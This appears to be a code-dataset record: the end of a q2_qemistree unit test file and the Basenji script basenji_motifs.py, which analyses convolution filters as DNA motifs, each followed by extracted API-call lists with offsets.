result = rerank_molecular_formulas(sirius_path=self.goodsirpath,
fragmentation_trees=sirout,
features=ions)
contents = os.listdir(result.get_path())
self.assertTrue(('zodiac_summary.csv' in contents))
def test_fingerid(self):
zodout = self.zodout.view(ZodiacDirFmt)
result = predict_fingerprints(sirius_path=self.goodsirpath,
molecular_formulas=zodout, ppm_max=15)
contents = os.listdir(result.get_path())
self.assertTrue(('summary_csi_fingerid.csv' in contents))
if __name__ == '__main__':
main()
| [
"q2_qemistree.rerank_molecular_formulas",
"os.path.join",
"os.environ.get",
"q2_qemistree.predict_fingerprints",
"q2_qemistree.compute_fragmentation_trees",
"unittest.main",
"q2_qemistree._fingerprint.artifactory",
"os.path.abspath"
] | [((4200, 4206), 'unittest.main', 'main', ([], {}), '()\n', (4204, 4206), False, 'from unittest import TestCase, main\n'), ((836, 874), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/foo/bin"""'], {}), "(THIS_DIR, 'data/foo/bin')\n", (848, 874), False, 'import os\n'), ((902, 966), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius-linux64-headless-4.0.1/bin"""'], {}), "(THIS_DIR, 'data/sirius-linux64-headless-4.0.1/bin')\n", (914, 966), False, 'import os\n'), ((1607, 1642), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""', '""""""'], {}), "('_JAVA_OPTIONS', '')\n", (1621, 1642), False, 'import os\n'), ((1657, 1747), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.goodsirpath', "['--help']"], {'constructor': 'OutputDirs', 'java_flags': '"""-Xms2G"""'}), "(self.goodsirpath, ['--help'], constructor=OutputDirs,\n java_flags='-Xms2G')\n", (1668, 1747), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((2171, 2279), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap')\n", (2198, 2279), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((2587, 2723), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""negative"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='negative')\n", (2614, 2723), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3535, 3638), 'q2_qemistree.rerank_molecular_formulas', 'rerank_molecular_formulas', ([], {'sirius_path': 'self.goodsirpath', 'fragmentation_trees': 'sirout', 'features': 'ions'}), '(sirius_path=self.goodsirpath, fragmentation_trees\n =sirout, features=ions)\n', (3560, 3638), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3924, 4018), 'q2_qemistree.predict_fingerprints', 'predict_fingerprints', ([], {'sirius_path': 'self.goodsirpath', 'molecular_formulas': 'zodout', 'ppm_max': '(15)'}), '(sirius_path=self.goodsirpath, molecular_formulas=\n zodout, ppm_max=15)\n', (3944, 4018), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((783, 808), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (798, 808), False, 'import os\n'), ((1086, 1131), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius.mgf.qza"""'], {}), "(THIS_DIR, 'data/sirius.mgf.qza')\n", (1098, 1131), False, 'import os\n'), ((1253, 1297), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirFolder.qza"""'], {}), "(THIS_DIR, 'data/sirFolder.qza')\n", (1265, 1297), False, 'import os\n'), ((1421, 1465), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/zodFolder.qza"""'], {}), "(THIS_DIR, 'data/zodFolder.qza')\n", (1433, 1465), False, 'import os\n'), ((1800, 1831), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""'], {}), "('_JAVA_OPTIONS')\n", (1814, 1831), False, 'import os\n'), ((1977, 2041), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.badsirpath', "['--help']"], {'constructor': 'OutputDirs'}), "(self.badsirpath, ['--help'], constructor=OutputDirs)\n", (1988, 2041), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((3105, 3241), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""n3gativ3"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3')\n", (3132, 3241), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n')] |
#!/usr/bin/env python
# Copyright 2017 Calico LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from __future__ import print_function
from optparse import OptionParser
import copy, os, pdb, random, shutil, subprocess, time
import h5py
import matplotlib
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy.stats import spearmanr
import seaborn as sns
from sklearn import preprocessing
import tensorflow as tf
import basenji
'''
basenji_motifs.py
Collect statistics and make plots to explore the first convolution layer
of the given model using the given sequences.
'''
weblogo_opts = '-X NO -Y NO --errorbars NO --fineprint ""'
weblogo_opts += ' -C "#CB2026" A A'
weblogo_opts += ' -C "#34459C" C C'
weblogo_opts += ' -C "#FBB116" G G'
weblogo_opts += ' -C "#0C8040" T T'
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <params_file> <model_file> <data_file>'
parser = OptionParser(usage)
parser.add_option(
'-a',
dest='act_t',
default=0.5,
type='float',
help=
'Activation threshold (as proportion of max) to consider for PWM [Default: %default]'
)
parser.add_option(
'-d',
dest='model_hdf5_file',
default=None,
help='Pre-computed model output as HDF5.')
parser.add_option('-o', dest='out_dir', default='.')
parser.add_option(
'-m',
dest='meme_db',
default='%s/data/motifs/Homo_sapiens.meme' % os.environ['BASENJIDIR'],
help='MEME database used to annotate motifs')
parser.add_option(
'-p',
dest='plot_heats',
default=False,
action='store_true',
help=
'Plot heat maps describing filter activations in the test sequences [Default: %default]'
)
parser.add_option(
'-s',
dest='sample',
default=None,
type='int',
help='Sample sequences from the test set [Default:%default]')
parser.add_option(
'-t',
dest='trim_filters',
default=False,
action='store_true',
help='Trim uninformative positions off the filter ends [Default: %default]'
)
(options, args) = parser.parse_args()
if len(args) != 3:
parser.error(
'Must provide Basenji parameters and model files and test data in HDF5'
' format.'
)
else:
params_file = args[0]
model_file = args[1]
data_file = args[2]
if not os.path.isdir(options.out_dir):
os.mkdir(options.out_dir)
#################################################################
# load data
data_open = h5py.File(data_file)
test_seqs1 = data_open['test_in']
test_targets = data_open['test_out']
try:
target_names = list(data_open['target_labels'])
except KeyError:
target_names = ['t%d' % ti for ti in range(test_targets.shape[1])]
if options.sample is not None:
# choose sampled indexes
sample_i = sorted(random.sample(range(test_seqs1.shape[0]), options.sample))
# filter
test_seqs1 = test_seqs1[sample_i]
test_targets = test_targets[sample_i]
# convert to letters
test_seqs = basenji.dna_io.hot1_dna(test_seqs1)
#################################################################
# model parameters and placeholders
job = basenji.dna_io.read_job_params(params_file)
job['seq_length'] = test_seqs1.shape[1]
job['seq_depth'] = test_seqs1.shape[2]
job['num_targets'] = test_targets.shape[2]
job['target_pool'] = int(np.array(data_open.get('pool_width', 1)))
t0 = time.time()
dr = basenji.seqnn.SeqNN()
dr.build(job)
print('Model building time %ds' % (time.time() - t0))
# adjust for fourier
job['fourier'] = 'train_out_imag' in data_open
if job['fourier']:
test_targets_imag = data_open['test_out_imag']
if options.valid:
test_targets_imag = data_open['valid_out_imag']
#################################################################
# predict
# initialize batcher
if job['fourier']:
batcher_test = basenji.batcher.BatcherF(
test_seqs1,
test_targets,
test_targets_imag,
batch_size=dr.batch_size,
pool_width=job['target_pool'])
else:
batcher_test = basenji.batcher.Batcher(
test_seqs1,
test_targets,
batch_size=dr.batch_size,
pool_width=job['target_pool'])
# initialize saver
saver = tf.train.Saver()
with tf.Session() as sess:
# load variables into session
saver.restore(sess, model_file)
# get weights
filter_weights = sess.run(dr.filter_weights[0])
filter_weights = np.transpose(np.squeeze(filter_weights), [2, 1, 0])
print(filter_weights.shape)
# test
t0 = time.time()
layer_filter_outs, _ = dr.hidden(sess, batcher_test, layers=[0])
filter_outs = layer_filter_outs[0]
print(filter_outs.shape)
# store useful variables
num_filters = filter_weights.shape[0]
filter_size = filter_weights.shape[2]
#################################################################
# individual filter plots
#################################################################
# also save information contents
filters_ic = []
meme_out = meme_intro('%s/filters_meme.txt' % options.out_dir, test_seqs)
for f in range(num_filters):
print('Filter %d' % f)
# plot filter parameters as a heatmap
plot_filter_heat(filter_weights[f, :, :],
'%s/filter%d_heat.pdf' % (options.out_dir, f))
# write possum motif file
filter_possum(filter_weights[f, :, :], 'filter%d' % f,
'%s/filter%d_possum.txt' % (options.out_dir,
f), options.trim_filters)
# plot weblogo of high scoring outputs
plot_filter_logo(
filter_outs[:, :, f],
filter_size,
test_seqs,
'%s/filter%d_logo' % (options.out_dir, f),
maxpct_t=options.act_t)
# make a PWM for the filter
filter_pwm, nsites = make_filter_pwm('%s/filter%d_logo.fa' %
(options.out_dir, f))
if nsites < 10:
# no information
filters_ic.append(0)
else:
# compute and save information content
filters_ic.append(info_content(filter_pwm))
# add to the meme motif file
meme_add(meme_out, f, filter_pwm, nsites, options.trim_filters)
meme_out.close()
#################################################################
# annotate filters
#################################################################
# run tomtom
subprocess.call(
'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %
(options.out_dir, options.out_dir, options.meme_db),
shell=True)
# read in annotations
filter_names = name_filters(
num_filters, '%s/tomtom/tomtom.txt' % options.out_dir, options.meme_db)
#################################################################
# print a table of information
#################################################################
table_out = open('%s/table.txt' % options.out_dir, 'w')
# print header for later panda reading
header_cols = ('', 'consensus', 'annotation', 'ic', 'mean', 'std')
print('%3s %19s %10s %5s %6s %6s' % header_cols, file=table_out)
for f in range(num_filters):
# collapse to a consensus motif
consensus = filter_motif(filter_weights[f, :, :])
# grab annotation
annotation = '.'
name_pieces = filter_names[f].split('_')
if len(name_pieces) > 1:
annotation = name_pieces[1]
# plot density of filter output scores
fmean, fstd = plot_score_density(
np.ravel(filter_outs[:, :, f]),
'%s/filter%d_dens.pdf' % (options.out_dir, f))
row_cols = (f, consensus, annotation, filters_ic[f], fmean, fstd)
print('%-3d %19s %10s %5.2f %6.4f %6.4f' % row_cols, file=table_out)
table_out.close()
#################################################################
# global filter plots
#################################################################
if options.plot_heats:
# plot filter-sequence heatmap
plot_filter_seq_heat(filter_outs, '%s/filter_seqs.pdf' % options.out_dir)
# plot filter-segment heatmap
plot_filter_seg_heat(filter_outs, '%s/filter_segs.pdf' % options.out_dir)
plot_filter_seg_heat(
filter_outs, '%s/filter_segs_raw.pdf' % options.out_dir, whiten=False)
# plot filter-target correlation heatmap
plot_target_corr(filter_outs, seq_targets, filter_names, target_names,
'%s/filter_target_cors_mean.pdf' % options.out_dir, 'mean')
plot_target_corr(filter_outs, seq_targets, filter_names, target_names,
'%s/filter_target_cors_max.pdf' % options.out_dir, 'max')
def get_motif_proteins(meme_db_file):
""" Hash motif_id's to protein names using the MEME DB file """
motif_protein = {}
for line in open(meme_db_file):
a = line.split()
if len(a) > 0 and a[0] == 'MOTIF':
if a[2][0] == '(':
motif_protein[a[1]] = a[2][1:a[2].find(')')]
else:
motif_protein[a[1]] = a[2]
return motif_protein
def info_content(pwm, transpose=False, bg_gc=0.415):
""" Compute PWM information content.
In the original analysis, I used a bg_gc=0.5. For any
future analysis, I ought to switch to the true hg19
value of 0.415.
"""
pseudoc = 1e-9
if transpose:
pwm = np.transpose(pwm)
bg_pwm = [1 - bg_gc, bg_gc, bg_gc, 1 - bg_gc]
ic = 0
for i in range(pwm.shape[0]):
for j in range(4):
# ic += 0.5 + pwm[i][j]*np.log2(pseudoc+pwm[i][j])
ic += -bg_pwm[j] * np.log2(
bg_pwm[j]) + pwm[i][j] * np.log2(pseudoc + pwm[i][j])
return ic
def make_filter_pwm(filter_fasta):
""" Make a PWM for this filter from its top hits """
nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
pwm_counts = []
nsites = 4 # pseudocounts
for line in open(filter_fasta):
if line[0] != '>':
seq = line.rstrip()
nsites += 1
if len(pwm_counts) == 0:
# initialize with the length
for i in range(len(seq)):
pwm_counts.append(np.array([1.0] * 4))
# count
for i in range(len(seq)):
try:
pwm_counts[i][nts[seq[i]]] += 1
except KeyError:
pwm_counts[i] += np.array([0.25] * 4)
# normalize
pwm_freqs = []
for i in range(len(pwm_counts)):
pwm_freqs.append([pwm_counts[i][j] / float(nsites) for j in range(4)])
return np.array(pwm_freqs), nsites - 4
def meme_add(meme_out, f, filter_pwm, nsites, trim_filters=False):
""" Print a filter to the growing MEME file
Attrs:
meme_out : open file
f (int) : filter index #
filter_pwm (array) : filter PWM array
nsites (int) : number of filter sites
"""
if not trim_filters:
ic_start = 0
ic_end = filter_pwm.shape[0] - 1
else:
ic_t = 0.2
# trim PWM of uninformative prefix
ic_start = 0
while ic_start < filter_pwm.shape[0] and info_content(
filter_pwm[ic_start:ic_start + 1]) < ic_t:
ic_start += 1
# trim PWM of uninformative suffix
ic_end = filter_pwm.shape[0] - 1
while ic_end >= 0 and info_content(filter_pwm[ic_end:ic_end + 1]) < ic_t:
ic_end -= 1
if ic_start < ic_end:
print('MOTIF filter%d' % f, file=meme_out)
print(
'letter-probability matrix: alength= 4 w= %d nsites= %d' %
(ic_end - ic_start + 1, nsites),
file=meme_out)
for i in range(ic_start, ic_end + 1):
print('%.4f %.4f %.4f %.4f' % tuple(filter_pwm[i]), file=meme_out)
print('', file=meme_out)
def meme_intro(meme_file, seqs):
""" Open MEME motif format file and print intro
Attrs:
meme_file (str) : filename
seqs [str] : list of strings for obtaining background freqs
Returns:
mem_out : open MEME file
"""
nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
# count
nt_counts = [1] * 4
for i in range(len(seqs)):
for nt in seqs[i]:
try:
nt_counts[nts[nt]] += 1
except KeyError:
pass
# normalize
nt_sum = float(sum(nt_counts))
nt_freqs = [nt_counts[i] / nt_sum for i in range(4)]
# open file for writing
meme_out = open(meme_file, 'w')
# print intro material
print('MEME version 4', file=meme_out)
print('', file=meme_out)
print('ALPHABET= ACGT', file=meme_out)
print('', file=meme_out)
print('Background letter frequencies:', file=meme_out)
print('A %.4f C %.4f G %.4f T %.4f' % tuple(nt_freqs), file=meme_out)
print('', file=meme_out)
return meme_out
def name_filters(num_filters, tomtom_file, meme_db_file):
""" Name the filters using Tomtom matches.
Attrs:
num_filters (int) : total number of filters
tomtom_file (str) : filename of Tomtom output table.
meme_db_file (str) : filename of MEME db
Returns:
filter_names [str] :
"""
# name by number
filter_names = ['f%d' % fi for fi in range(num_filters)]
# name by protein
if tomtom_file is not None and meme_db_file is not None:
motif_protein = get_motif_proteins(meme_db_file)
# hash motifs and q-value's by filter
filter_motifs = {}
tt_in = open(tomtom_file)
tt_in.readline()
for line in tt_in:
a = line.split()
fi = int(a[0][6:])
motif_id = a[1]
qval = float(a[5])
filter_motifs.setdefault(fi, []).append((qval, motif_id))
tt_in.close()
# assign filter's best match
for fi in filter_motifs:
top_motif = sorted(filter_motifs[fi])[0][1]
filter_names[fi] += '_%s' % motif_protein[top_motif]
return np.array(filter_names)
################################################################################
# plot_target_corr
#
# Plot a clustered heatmap of correlations between filter activations and
# targets.
#
# Input
# filter_outs:
# filter_names:
# target_names:
# out_pdf:
################################################################################
def plot_target_corr(filter_outs, seq_targets, filter_names, target_names, out_pdf, seq_op='mean'):
num_seqs = filter_outs.shape[0]
num_targets = len(target_names)
if seq_op == 'mean':
filter_outs_seq = filter_outs.mean(axis=2)
else:
filter_outs_seq = filter_outs.max(axis=2)
# std is sequence by filter.
filter_seqs_std = filter_outs_seq.std(axis=0)
filter_outs_seq = filter_outs_seq[:, filter_seqs_std > 0]
filter_names_live = filter_names[filter_seqs_std > 0]
filter_target_cors = np.zeros((len(filter_names_live), num_targets))
for fi in range(len(filter_names_live)):
for ti in range(num_targets):
cor, p = spearmanr(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])
filter_target_cors[fi, ti] = cor
cor_df = pd.DataFrame(
filter_target_cors, index=filter_names_live, columns=target_names)
sns.set(font_scale=0.3)
plt.figure()
sns.clustermap(cor_df, cmap='BrBG', center=0, figsize=(8, 10))
plt.savefig(out_pdf)
plt.close()
################################################################################
# plot_filter_seq_heat
#
# Plot a clustered heatmap of filter activations in
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def plot_filter_seq_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):
# compute filter output means per sequence
filter_seqs = filter_outs.mean(axis=2)
# whiten
if whiten:
filter_seqs = preprocessing.scale(filter_seqs)
# transpose
filter_seqs = np.transpose(filter_seqs)
if drop_dead:
filter_stds = filter_seqs.std(axis=1)
filter_seqs = filter_seqs[filter_stds > 0]
# downsample sequences
seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)
hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)
hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)
sns.set(font_scale=0.3)
plt.figure()
sns.clustermap(
filter_seqs[:, seqs_i],
row_cluster=True,
col_cluster=True,
linewidths=0,
xticklabels=False,
vmin=hmin,
vmax=hmax)
plt.savefig(out_pdf)
#out_png = out_pdf[:-2] + 'ng'
#plt.savefig(out_png, dpi=300)
plt.close()
################################################################################
# plot_filter_seq_heat
#
# Plot a clustered heatmap of filter activations in sequence segments.
#
# Mean doesn't work well for the smaller segments for some reason, but taking
# the max looks OK. Still, similar motifs don't cluster quite as well as you
# might expect.
#
# Input
# filter_outs
################################################################################
def plot_filter_seg_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):
b = filter_outs.shape[0]
f = filter_outs.shape[1]
l = filter_outs.shape[2]
s = 5
while l / float(s) - (l / s) > 0:
s += 1
print('%d segments of length %d' % (s, l / s))
# split into multiple segments
filter_outs_seg = np.reshape(filter_outs, (b, f, s, l / s))
# mean across the segments
filter_outs_mean = filter_outs_seg.max(axis=3)
# break each segment into a new instance
filter_seqs = np.reshape(np.swapaxes(filter_outs_mean, 2, 1), (s * b, f))
# whiten
if whiten:
filter_seqs = preprocessing.scale(filter_seqs)
# transpose
filter_seqs = np.transpose(filter_seqs)
if drop_dead:
filter_stds = filter_seqs.std(axis=1)
filter_seqs = filter_seqs[filter_stds > 0]
# downsample sequences
seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)
hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)
hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)
sns.set(font_scale=0.3)
if whiten:
dist = 'euclidean'
else:
dist = 'cosine'
plt.figure()
sns.clustermap(
filter_seqs[:, seqs_i],
metric=dist,
row_cluster=True,
col_cluster=True,
linewidths=0,
xticklabels=False,
vmin=hmin,
vmax=hmax)
plt.savefig(out_pdf)
#out_png = out_pdf[:-2] + 'ng'
#plt.savefig(out_png, dpi=300)
plt.close()
################################################################################
# filter_motif
#
# Collapse the filter parameter matrix to a single DNA motif.
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def filter_motif(param_matrix):
nts = 'ACGT'
motif_list = []
for v in range(param_matrix.shape[1]):
max_n = 0
for n in range(1, 4):
if param_matrix[n, v] > param_matrix[max_n, v]:
max_n = n
if param_matrix[max_n, v] > 0:
motif_list.append(nts[max_n])
else:
motif_list.append('N')
return ''.join(motif_list)
################################################################################
# filter_possum
#
# Write a Possum-style motif
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def filter_possum(param_matrix, motif_id, possum_file, trim_filters=False, mult=200):
# possible trim
trim_start = 0
trim_end = param_matrix.shape[1] - 1
trim_t = 0.3
if trim_filters:
# trim PWM of uninformative prefix
while trim_start < param_matrix.shape[1] and np.max(
param_matrix[:, trim_start]) - np.min(
param_matrix[:, trim_start]) < trim_t:
trim_start += 1
# trim PWM of uninformative suffix
while trim_end >= 0 and np.max(param_matrix[:, trim_end]) - np.min(
param_matrix[:, trim_end]) < trim_t:
trim_end -= 1
if trim_start < trim_end:
possum_out = open(possum_file, 'w')
print('BEGIN GROUP', file=possum_out)
print('BEGIN FLOAT', file=possum_out)
print('ID %s' % motif_id, file=possum_out)
print('AP DNA', file=possum_out)
print('LE %d' % (trim_end + 1 - trim_start), file=possum_out)
for ci in range(trim_start, trim_end + 1):
print(
'MA %s' % ' '.join(['%.2f' % (mult * n)
for n in param_matrix[:, ci]]),
file=possum_out)
print('END', file=possum_out)
print('END', file=possum_out)
possum_out.close()
################################################################################
# plot_filter_heat
#
# Plot a heatmap of the filter's parameters.
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def plot_filter_heat(param_matrix, out_pdf):
param_range = abs(param_matrix).max()
sns.set(font_scale=2)
plt.figure(figsize=(param_matrix.shape[1], 4))
sns.heatmap(
param_matrix,
cmap='PRGn',
linewidths=0.2,
vmin=-param_range,
vmax=param_range)
ax = plt.gca()
ax.set_xticklabels(range(1, param_matrix.shape[1] + 1))
ax.set_yticklabels('TGCA', rotation='horizontal') # , size=10)
plt.savefig(out_pdf)
plt.close()
################################################################################
# plot_filter_logo
#
# Plot a weblogo of the filter's occurrences
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def plot_filter_logo(filter_outs, filter_size, seqs, out_prefix, raw_t=0, maxpct_t=None):
if maxpct_t:
all_outs = np.ravel(filter_outs)
all_outs_mean = all_outs.mean()
all_outs_norm = all_outs - all_outs_mean
raw_t = maxpct_t * all_outs_norm.max() + all_outs_mean
left_pad = (filter_size - 1) // 2
right_pad = filter_size - left_pad
# print fasta file of positive outputs
filter_fasta_out = open('%s.fa' % out_prefix, 'w')
filter_count = 0
for i in range(filter_outs.shape[0]):
for j in range(filter_outs.shape[1]):
if filter_outs[i, j] > raw_t:
# construct kmer
kmer = ''
# determine boundaries, considering padding
fstart = j - left_pad
fend = fstart + filter_size
# if it starts in left_pad
if fstart < 0:
kmer += 'N' * (-fstart)
fstart = 0
# add primary sequence
kmer += seqs[i][fstart:fend]
# if it ends in right_pad
if fend > len(seqs[i]):
kmer += 'N' * (fend - len(seqs[i]))
# output
print('>%d_%d' % (i, j), file=filter_fasta_out)
print(kmer, file=filter_fasta_out)
filter_count += 1
filter_fasta_out.close()
# make weblogo
if filter_count > 0:
weblogo_cmd = 'weblogo %s < %s.fa > %s.eps' % (weblogo_opts, out_prefix,
out_prefix)
subprocess.call(weblogo_cmd, shell=True)
################################################################################
# plot_score_density
#
# Plot the score density and print to the stats table.
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def plot_score_density(f_scores, out_pdf):
sns.set(font_scale=1.3)
plt.figure()
sns.distplot(f_scores, kde=False)
plt.xlabel('ReLU output')
plt.savefig(out_pdf)
plt.close()
return f_scores.mean(), f_scores.std()
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
# pdb.runcall(main)
| [
"basenji.seqnn.SeqNN",
"numpy.array",
"basenji.dna_io.read_job_params",
"basenji.batcher.BatcherF",
"seaborn.set",
"numpy.reshape",
"seaborn.distplot",
"matplotlib.pyplot.xlabel",
"basenji.batcher.Batcher",
"tensorflow.Session",
"numpy.max",
"matplotlib.pyplot.close",
"os.path.isdir",
"basenji.dna_io.hot1_dna",
"subprocess.call",
"os.mkdir",
"numpy.min",
"pandas.DataFrame",
"scipy.stats.spearmanr",
"matplotlib.pyplot.savefig",
"matplotlib.use",
"seaborn.clustermap",
"matplotlib.pyplot.gca",
"seaborn.heatmap",
"h5py.File",
"numpy.squeeze",
"numpy.log2",
"numpy.transpose",
"time.time",
"sklearn.preprocessing.scale",
"tensorflow.train.Saver",
"optparse.OptionParser",
"numpy.swapaxes",
"matplotlib.pyplot.figure",
"numpy.random.randint",
"numpy.ravel",
"numpy.percentile"
] | [((829, 850), 'matplotlib.use', 'matplotlib.use', (['"""PDF"""'], {}), "('PDF')\n", (843, 850), False, 'import matplotlib\n'), ((1670, 1689), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\n', (1682, 1689), False, 'from optparse import OptionParser\n'), ((3270, 3290), 'h5py.File', 'h5py.File', (['data_file'], {}), '(data_file)\n', (3279, 3290), False, 'import h5py\n'), ((3793, 3828), 'basenji.dna_io.hot1_dna', 'basenji.dna_io.hot1_dna', (['test_seqs1'], {}), '(test_seqs1)\n', (3816, 3828), False, 'import basenji\n'), ((3945, 3988), 'basenji.dna_io.read_job_params', 'basenji.dna_io.read_job_params', (['params_file'], {}), '(params_file)\n', (3975, 3988), False, 'import basenji\n'), ((4195, 4206), 'time.time', 'time.time', ([], {}), '()\n', (4204, 4206), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4214, 4235), 'basenji.seqnn.SeqNN', 'basenji.seqnn.SeqNN', ([], {}), '()\n', (4233, 4235), False, 'import basenji\n'), ((5041, 5057), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (5055, 5057), True, 'import tensorflow as tf\n'), ((7204, 7367), 'subprocess.call', 'subprocess.call', (["('tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db))"], {'shell': '(True)'}), "(\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db), shell=True)\n", (7219, 7367), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((14271, 14293), 'numpy.array', 'np.array', (['filter_names'], {}), '(filter_names)\n', (14279, 14293), True, 'import numpy as np\n'), ((15402, 15481), 'pandas.DataFrame', 'pd.DataFrame', (['filter_target_cors'], {'index': 'filter_names_live', 'columns': 'target_names'}), '(filter_target_cors, index=filter_names_live, columns=target_names)\n', (15414, 15481), True, 'import pandas as pd\n'), ((15492, 15515), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (15499, 15515), True, 'import seaborn as sns\n'), ((15518, 15530), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (15528, 15530), True, 'import matplotlib.pyplot as plt\n'), ((15533, 15595), 'seaborn.clustermap', 'sns.clustermap', (['cor_df'], {'cmap': '"""BrBG"""', 'center': '(0)', 'figsize': '(8, 10)'}), "(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\n", (15547, 15595), True, 'import seaborn as sns\n'), ((15598, 15618), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (15609, 15618), True, 'import matplotlib.pyplot as plt\n'), ((15621, 15632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15630, 15632), True, 'import matplotlib.pyplot as plt\n'), ((16225, 16250), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (16237, 16250), True, 'import numpy as np\n'), ((16394, 16441), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (16411, 16441), True, 'import numpy as np\n'), ((16452, 16494), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (16465, 16494), True, 'import numpy as np\n'), ((16504, 16547), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (16517, 16547), True, 'import numpy as np\n'), ((16551, 16574), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (16558, 16574), True, 'import seaborn as sns\n'), ((16578, 16590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (16588, 16590), True, 'import matplotlib.pyplot as plt\n'), ((16593, 16726), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True,\n linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (16607, 16726), True, 'import seaborn as sns\n'), ((16768, 16788), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (16779, 16788), True, 'import matplotlib.pyplot as plt\n'), ((16857, 16868), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (16866, 16868), True, 'import matplotlib.pyplot as plt\n'), ((17644, 17685), 'numpy.reshape', 'np.reshape', (['filter_outs', '(b, f, s, l / s)'], {}), '(filter_outs, (b, f, s, l / s))\n', (17654, 17685), True, 'import numpy as np\n'), ((17992, 18017), 